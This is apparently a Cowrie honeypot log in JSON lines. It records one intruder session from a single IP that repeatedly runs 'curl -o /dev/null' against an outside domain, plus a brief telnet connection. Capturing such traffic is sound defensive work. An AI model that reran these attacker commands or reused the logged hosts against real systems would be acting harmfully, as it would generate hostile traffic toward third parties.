{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.589028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.630452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.631650Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.669904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.670917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.718644Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.719733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.761926Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.762962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.801638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.802897Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.841567Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.842832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.883213Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.884728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.921676Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.923021Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.965511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.966794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.010140Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.011743Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.052780Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.053741Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.097228Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.098217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.155544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.157374Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.194186Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.195308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.232949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.234212Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.273377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.274708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.315419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.316600Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.353982Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.355035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.397734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.399086Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.436910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.438018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.489285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.490336Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.527904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.529308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.576731Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.577853Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.616690Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.617840Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.657212Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.658327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.696758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.697740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.734418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.735419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.772094Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.773176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:29.830866Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:29.831835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.027126Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.028395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.065242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.066203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.103106Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.103988Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.150874Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.152188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.188835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.189759Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.228592Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.229566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.274869Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.275888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.312587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.313535Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.350447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.351530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.388475Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.389434Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.426306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.427398Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.463775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.464927Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.502393Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.504168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.572662Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.573759Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.610540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.611982Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.649041Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.650222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.691544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.692643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.732874Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.733933Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.771375Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.772480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.835067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.836193Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:30.876540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:30.877555Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34734,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3c08ab2fbc9","protocol":"telnet","message":"New connection: 212.227.125.160:34734 (1.2.3.4:23) [session: e3c08ab2fbc9]","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.025097Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.185254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.186275Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.229179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.230228Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.277973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.279225Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.319380Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.320472Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.357884Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.359095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":0.37621045112609863,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.401214Z","src_ip":"212.227.125.160","session":"e3c08ab2fbc9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.403026Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.403929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.442168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.443504Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.480723Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.482030Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.520076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.521210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.559057Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.560273Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.599169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.600171Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:31.636837Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:31.637849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:32.047830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:32.049075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:32.164238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
